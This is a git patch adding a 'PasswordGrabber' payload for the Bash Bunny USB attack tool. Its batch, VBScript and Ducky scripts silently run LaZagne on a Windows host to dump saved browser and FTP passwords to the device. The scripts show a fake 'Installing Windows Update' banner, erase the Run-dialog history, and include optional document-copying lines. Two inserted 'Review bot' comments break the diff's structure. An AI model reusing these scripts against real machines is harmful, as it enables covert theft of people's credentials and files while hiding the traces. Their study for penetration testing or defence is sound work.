From 2903a16d890d27001c1b6bfb7c09f56d21412530 Mon Sep 17 00:00:00 2001
From: RazerBlade
Date: Sun, 16 Apr 2017 11:03:03 +0200
Subject: [PATCH] Added Password Grabber payload (#169) * Add files via upload * Update readme.md * Update e.cmd * Update payload.txt Added 1.1 Firmware support * Update e.cmd Added Date and time functions and added some comments * Delete laZagne.exe * Update readme.md Added support to Hak5 new guidelines * Update readme.md * Update readme.md * Update readme.md * Update readme.md
---
 payloads/library/PasswordGrabber/d.cmd | 4 +++
 payloads/library/PasswordGrabber/e.cmd | 38 ++++++++++++++++++++
 payloads/library/PasswordGrabber/i.vbs | 1 +
 payloads/library/PasswordGrabber/payload.txt | 19 ++++++++++
 payloads/library/PasswordGrabber/readme.md | 32 +++++++++++++++++
 5 files changed, 94 insertions(+)
 create mode 100644 payloads/library/PasswordGrabber/d.cmd
 create mode 100644 payloads/library/PasswordGrabber/e.cmd
 create mode 100644 payloads/library/PasswordGrabber/i.vbs
 create mode 100644 payloads/library/PasswordGrabber/payload.txt
 create mode 100644 payloads/library/PasswordGrabber/readme.md
diff --git a/payloads/library/PasswordGrabber/d.cmd b/payloads/library/PasswordGrabber/d.cmd
new file mode 100644
index 00000000..604ef639
--- /dev/null
+++ b/payloads/library/PasswordGrabber/d.cmd
@@ -0,0 +1,4 @@
+@echo off
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+cscript %~dp0\i.vbs %~dp0\e.cmd
+@exit
\ No newline at end of file
diff --git a/payloads/library/PasswordGrabber/e.cmd b/payloads/library/PasswordGrabber/e.cmd
new file mode 100644
index 00000000..5f8d8d89
--- /dev/null
+++ b/payloads/library/PasswordGrabber/e.cmd
@@ -0,0 +1,38 @@
+@echo off
+@echo Installing Windows Update
+
+REM Delete registry keys storing Run dialog history
+REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
+
+REM Creates directory compromised of computer name, date and time
+REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
+
+REM This executes LaZagne in the current directory and outputs the password file to Loot
+REM Time and Date is also added
+setlocal
+cd /d %~dp0
+%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt
+
+REM These lines if you just want Passwords and no files.
+set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
+mkdir %dst% >>nul
+
+if Exist %USERPROFILE%\Documents (
+REM /C Continues copying even if errors occur.
+REM /Q Does not display file names while copying.
+REM /G Allows the copying of encrypted files to destination that does not support encryption.
+REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
+REM /E Copies directories and subdirectories, including empty ones.
+
+REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
+
+REM Same as above but does not create empty directories
+REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
+
+)
+
+REM Blink CAPSLOCK key
+start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
+
+@cls
+@exit
diff --git a/payloads/library/PasswordGrabber/i.vbs b/payloads/library/PasswordGrabber/i.vbs
new file mode 100644
index 00000000..1ffd3c3e
--- /dev/null
+++ b/payloads/library/PasswordGrabber/i.vbs
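Review bot: The comment `REM %~d0 = path to this batch file` does not describe the code under it, which uses `%~dp0` throughout; `%~d0` expands to the drive letter only, whereas `%~dp0` is drive plus directory with a trailing backslash, so the comment should read `REM %~dp0 = drive and directory of this batch file`. The preceding comment `REM Creates directory compromised of computer name, date and time` should say `composed of`. Neither the comments here nor the readme disclose that the `REG DELETE ...\Explorer\RunMRU /f` line erases the user's Run-dialog history on the host, or that the `@echo Installing Windows Update` banner misdescribes what the script does; both should be stated in the readme's Description so that anyone auditing or authorizing a run knows which host artifacts the payload alters, and so defenders reading the library know the RunMRU wipe is a recognizable trace of this payload.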
@@ -0,0 +1 @@
+CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
diff --git a/payloads/library/PasswordGrabber/payload.txt b/payloads/library/PasswordGrabber/payload.txt
new file mode 100644
index 00000000..44a01065
--- /dev/null
+++ b/payloads/library/PasswordGrabber/payload.txt
@@ -0,0 +1,19 @@
+#!/bin/bash
+#
+# Title: USB Exfiltrator
+# Author: Hak5Darren
+# Version: 1.1
+# Target: Windows XP SP3+
+# Props: Diggster, IMcPwn
+# Category: Exfiltration
+#
+# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
+# which in turn executes e.cmd invisibly using i.vbs
+# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
+#
+
+LED ATTACK
+ATTACKMODE HID STORAGE
+DUCKY_LANG se
+RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
+LED FINISH
diff --git a/payloads/library/PasswordGrabber/readme.md b/payloads/library/PasswordGrabber/readme.md
new file mode 100644
index 00000000..b9f0efb8
--- /dev/null
+++ b/payloads/library/PasswordGrabber/readme.md
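Review bot: The header block of payload.txt is carried over from the usb_exfiltrator payload and contradicts this commit's own readme: `# Title: USB Exfiltrator`, `# Author: Hak5Darren` and `# Target: Windows XP SP3+` should carry the values the readme gives (PasswordGrabber, RazerBlade, Windows). The description comment likewise still describes only the document copy, which e.cmd leaves commented out, and says nothing about e.cmd running laZagne.exe and writing its output under the loot folder, which is what this payload actually does; the comment should name that behavior so a reader of payload.txt alone is not misled about what the payload collects. The readme's "Creds" line credits AlessandroZ, so the header's `# Props:` line is presumably also stale and should be reconciled with it.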
@@ -0,0 +1,32 @@
+# PasswordGrabber
+
+* Author: RazerBlade
+* Creds: Hak5Darren, AlessandroZ
+* Version: Version 1.1
+* Firmware support: 1.1
+* Target: Windows
+
+## Description
+
+Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
+This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
+Full read here: https://github.com/AlessandroZ/LaZagne
+
+
+## Configuration
+By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
+I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
+
+Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
+When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
+
+## STATUS
+
+| LED | Status |
+| ------------------ | -------------------------------------------- |
+| Red | Attack Setup |
+| Green | Attack Complete |
+
+## Discussion
+[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
+